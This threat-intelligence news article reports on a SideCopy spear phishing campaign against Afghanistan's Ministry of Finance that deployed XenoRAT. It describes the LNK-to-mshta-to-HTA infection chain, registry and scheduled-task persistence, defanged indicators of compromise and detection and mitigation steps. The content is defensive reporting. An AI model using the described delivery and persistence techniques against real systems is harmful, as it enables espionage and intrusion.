SideCopy Uses XenoRAT in Spear Phishing Attack on Afghanistan Finance Ministry
10 min. read 
Published on
A Pakistan-linked threat group tracked as SideCopy targeted Afghanistan’s Ministry of Finance with a spear phishing campaign that deployed XenoRAT, an open-source remote access trojan. The campaign, called Operation XENOFISCAL, focused on provincial finance officials and used a Pashto-language lure to make the attack look relevant to Afghan government workers.
Seqrite Labs attributed the activity to the SideCopy APT cluster with medium-to-high confidence. The researchers said the campaign targeted Afghanistan’s Ministry of Finance, provincial revenue and finance directorates, and Pashto-speaking provincial government employees.
Access content across the globe at the highest speed rate.
70% of our readers choose Private Internet Access
70% of our readers choose ExpressVPN
Browse the web from multiple devices with industry-standard security protocols.
Faster dedicated servers for specific actions (currently at summer discounts)
The attack began with a ZIP archive containing a malicious Windows shortcut file. Once opened, the shortcut abused mshta.exe to fetch a remote HTA payload from a compromised Afghan education domain, then moved through several stages before installing XenoRAT 1.8.7 on the infected Windows host.
Operation XENOFISCAL targeted Afghanistan’s finance network
The lure file used a Pashto filename that translated to a list of employees introduced to a seminar on intellectual and psychological warfare. That theme suggests the attackers understood the administrative context of their targets and designed the phishing document for provincial officials.
According to The Hacker News, the campaign also targeted provincial revenue and finance directorates, known as Mustoufiats. These regional finance offices play an important role in Afghanistan’s revenue and finance administration.
SideCopy is widely viewed as a Pakistan-linked cluster operating under the broader Transparent Tribe, also known as APT36, umbrella. Zscaler ThreatLabz has previously described APT36 as a Pakistan-attributed threat group that has targeted government organizations and used evolving tactics, techniques, and tools.
Key details at a glance
| Item | Details |
|---|---|
| Campaign name | Operation XENOFISCAL |
| Attributed group | SideCopy, linked to Transparent Tribe or APT36 |
| Main target | Afghanistan Ministry of Finance |
| Targeted users | Provincial revenue and finance officials |
| Initial file | ZIP archive with a Pashto-named malicious LNK file |
| Final payload | XenoRAT 1.8.7 |
| Main techniques | mshta execution, HTA delivery, registry persistence, staged loaders, scheduled task persistence |
The use of a local Afghan education domain for delivery also made the campaign harder to spot. Traffic to domestic infrastructure can look less suspicious than traffic to newly registered foreign domains, especially in government networks that already communicate with local public-sector systems.
The final command-and-control server sat separately from the delivery domain. This separation helps attackers maintain access even if defenders discover and block the first-stage delivery site.
How the infection chain worked
The infection chain started when the victim opened the malicious shortcut file. The LNK launched mshta.exe, a legitimate Windows utility that can run HTML Application content. Attackers often abuse this binary because it lets malicious scripts run through a trusted Microsoft-signed tool.
MITRE ATT&CK’s mshta technique explains that adversaries may abuse mshta.exe to proxy execution of malicious HTA files, JavaScript, or VBScript through a trusted Windows utility. That matches the early stage of the Operation XENOFISCAL chain.
After mshta fetched the HTA payload, obfuscated JavaScript decoded in memory and established registry-based persistence. The malware disguised a Run key as a Microsoft Edge-related entry, then continued to stage loader components and the final XenoRAT payload.
Five-stage attack flow
| Stage | Observed behavior | Defender concern |
|---|---|---|
| 1. Spear phishing | ZIP archive delivers a malicious Pashto-named LNK file | Targeted lure designed for Afghan finance officials |
| 2. HTA execution | LNK uses mshta.exe to fetch a remote payload | Trusted Windows utility runs attacker code |
| 3. JavaScript staging | Obfuscated JavaScript decodes in memory | Reduced disk artifacts and harder static detection |
| 4. Loader execution | .NET loader components retrieve and unpack encoded payload data | Staged delivery hides the final malware until later in the chain |
| 5. XenoRAT deployment | XenoRAT 1.8.7 connects to remote C2 and creates persistence | Remote control, surveillance, and long-term access |
The operation used living-off-the-land behavior at the start and a fileless-style loading approach in later stages. That combination gives attackers a better chance of avoiding older antivirus rules that focus only on known executable files written to disk.
The malware also dropped a decoy document that appeared to be a real Afghan Ministry of Finance staff directory. Seqrite said the document listed officials across all 34 provinces, including finance directors, revenue chiefs, financial officers, and secretaries, along with mobile numbers.
XenoRAT gave attackers broad control of infected systems
XenoRAT is an open-source remote access tool written in C#. Its public GitHub repository describes it as a remote access tool for controlling Windows 10 and Windows 11 systems, with features such as screen control, webcam access, live microphone, reverse proxy, file management, registry management, shell access, and keylogging.
Those features make XenoRAT dangerous when used by an espionage group. On a compromised government workstation, a RAT can help attackers read files, capture credentials, watch activity, move through local data, and maintain covert access.
In this campaign, XenoRAT connected to a hard-coded command-and-control IP address over encrypted TCP traffic. It also used a mutex named clouda to avoid duplicate instances and queried installed antivirus products before reporting back to the operators.
Persistence and infrastructure details
The malware used more than one persistence method. It created a Registry Run key under HKCU and also registered a scheduled task named XenoUpdateManager. That gives the RAT a way to restart after reboot and continue communications with attacker infrastructure.
MITRE ATT&CK’s scheduled task technique describes how adversaries use Windows Task Scheduler or schtasks.exe to execute payloads at a chosen time or trigger. XenoRAT’s scheduled task fits that persistence pattern.
The infrastructure design also shows planning. The delivery domain abimj.edu.af resolved to Afghan-hosted IP addresses, while the XenoRAT C2 server was hosted on a European provider. This split makes remediation harder because blocking the delivery site alone may not remove active implants.
Selected indicators of compromise
| Type | Indicator | Description |
|---|---|---|
| Domain | abimj.edu.af | Compromised Afghan education domain used for payload delivery |
| URL | hxxp://abimj.edu.af/index.php | Stage-1 HTA/PHP payload endpoint |
| URL | hxxp://abimj.edu.af/institute/cloudiyaf/document.pdf | Decoy PDF download URL |
| URL | hxxps://abimj.edu.af/institute/10/ | Stage-2 payload download URL |
| URL | hxxps://abimj.edu.af/institute/7/ | Alternate Stage-2 URL for Windows 7 targets |
| IP address | 185.235.137.106 | XenoRAT C2 server |
| IP address | 103.132.98.224 | Delivery domain resolved IP |
| IP address | 103.132.98.226 | Delivery domain resolved IP |
| Registry key | HKCU\Software\Microsoft\Windows\CurrentVersion\Run “Edgre” | Persistence Run key masquerading as Microsoft Edge |
| Scheduled task | XenoUpdateManager | Persistence task created by XenoRAT |
| Mutex | clouda | XenoRAT single-instance mutex |
| File name | zuidrt.hta | Persistent HTA payload stored in a public folder |
| File name | noway.bat | Hidden batch file used for registry persistence execution |
| File name | WayBroad.dll | Stage-1 loader DLL |
| File name | Aotestpass.dll | Stage-2 loader DLL |
| File name | UpdateChecker.dll | XenoRAT-related payload name observed in the campaign |
Hash-based IoCs can help with triage, but defenders should not rely on them alone. Attackers can change ZIP archives, shortcut files, loaders, and payload packaging quickly, while the behavior around mshta, HTA retrieval, registry persistence, and scheduled task creation tends to remain more useful for detection.
The campaign also shows how a compromised local website can become part of an espionage operation. Security teams should treat unexpected payload delivery from familiar regional domains with the same caution as delivery from new or foreign infrastructure.
What defenders should monitor
- Unexpected mshta.exe launches from ZIP archives, LNK files, email attachments, or user profile paths.
- HTA, JavaScript, or VBScript execution that follows a shortcut file opening.
- New Run keys under HKCU that imitate Microsoft Edge or other trusted software names.
- Scheduled tasks named XenoUpdateManager or tasks that launch unusual payloads from user-writable folders.
- Outbound traffic to 185.235.137.106 or suspicious European hosting providers from finance ministry systems.
- Connections to abimj.edu.af paths that do not match normal browser activity.
- Files named zuidrt.hta, noway.bat, WayBroad.dll, Aotestpass.dll, or UpdateChecker.dll in unusual directories.
- Mutex creation using the name clouda.
The campaign’s use of mshta deserves special attention because it fits a common defense evasion pattern. A second look at MITRE’s mshta guidance shows why this signed Windows binary remains attractive to attackers: it can run script content through a trusted utility that already exists on the system.
Likewise, scheduled task monitoring can reveal long-term access attempts. The MITRE scheduled task entry notes that adversaries use the Task Scheduler utility and related APIs for persistence, execution, and privilege-related goals.
Why SideCopy’s tactics matter for government networks
SideCopy’s use of a tailored Pashto lure, a ministry-themed decoy, and Afghan-hosted delivery infrastructure suggests a targeted operation rather than broad commodity malware distribution. The attackers designed the chain around the language, institutions, and administrative workflows of the victims.
Zscaler’s APT36 research also shows how Transparent Tribe-related activity has repeatedly used phishing and new tooling against government targets. The Afghanistan campaign follows the same strategic pattern, but with a lure tailored to Afghan finance offices.
For targeted government agencies, user training must go beyond generic phishing warnings. Officials should learn how malicious LNK files, fake PDF icons, archive attachments, and local-language lures can hide malware even when the filename looks work-related.
Immediate mitigation steps
| Priority | Action | Reason |
|---|---|---|
| High | Block known C2 and delivery indicators | Reduces active communication with attacker infrastructure |
| High | Hunt for mshta child processes and HTA execution | Finds the early execution stage |
| High | Audit Registry Run keys and scheduled tasks | Finds persistence linked to the RAT |
| Medium | Restrict HTA execution where business processes do not require it | Reduces abuse of mshta and HTA payloads |
| Medium | Apply application allow-listing for scripts and shortcuts | Blocks many LNK-to-script execution paths |
| Medium | Review finance-related phishing attachments in Pashto and Dari | Helps find related targeting attempts |
XenoRAT’s public feature list also makes the risk clear. The XenoRAT project page lists functions such as screen control, webcam, microphone, keylogging, file management, registry management, shell access, reverse proxy, and startup behavior.
Security teams should treat any XenoRAT infection as a full compromise event. Affected systems should be isolated, credentials used on those systems should be rotated, persistence should be removed, and logs should be reviewed for lateral movement or data access.
The public reporting on Operation XENOFISCAL confirms that the campaign fits a broader pattern of SideCopy activity aimed at South Asian entities. For Afghanistan’s finance sector, the incident shows how targeted phishing can turn a single local-language attachment into a persistent espionage foothold.
The strongest defense is layered detection. Teams need email filtering, shortcut file controls, mshta monitoring, registry and task auditing, endpoint isolation playbooks, and user reporting channels that work in the languages attackers use for their lures.
FAQ
Operation XENOFISCAL is a SideCopy spear phishing campaign targeting Afghanistan’s Ministry of Finance and provincial finance officials. The campaign used a Pashto-language lure and deployed XenoRAT on infected Windows systems.
SideCopy is a Pakistan-linked threat cluster associated with the broader Transparent Tribe or APT36 umbrella. It has been linked to espionage activity against South Asian government, defense, and public-sector targets.
The attack began with a spear phishing email carrying a ZIP archive. Inside was a malicious LNK file disguised with a PDF icon and a Pashto filename designed to appeal to Afghan government finance officials.
XenoRAT is an open-source remote access trojan written in C#. It can provide remote control, file management, keylogging, screen control, webcam and microphone access, reverse proxy functions, and persistence features.
Defenders should monitor mshta.exe execution from shortcut files, HTA downloads from unusual domains, suspicious Registry Run keys, the XenoUpdateManager scheduled task, the clouda mutex, and outbound traffic to known C2 infrastructure.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
Improve this guide
User forum
0 messages